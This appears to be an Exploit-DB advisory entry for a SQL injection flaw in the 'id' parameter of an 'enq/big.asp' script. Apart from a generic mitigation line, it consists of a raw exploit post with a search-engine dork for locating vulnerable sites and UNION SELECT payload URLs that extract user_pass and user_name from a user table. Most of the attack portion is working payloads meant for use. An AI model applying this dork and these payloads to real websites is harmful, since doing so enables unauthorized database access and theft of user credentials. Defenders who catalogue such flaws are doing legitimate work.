(big.asp) SQL Injection Vulnerability

vendor:

N/A

by:

Ra3cH

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

(big.asp) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'big.asp' script. The malicious query can be used to extract sensitive information from the database, such as user credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

*******************************************************************************
# Author   : Ra3cH
# Price    : N/A
# Title    : (big.asp) SQL Injection Vulnerability
# Site     : www.dz4all.com/cc
# Dork     : inurl:enq/big.asp?id=
# Risk     : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id=  [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Exemple:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &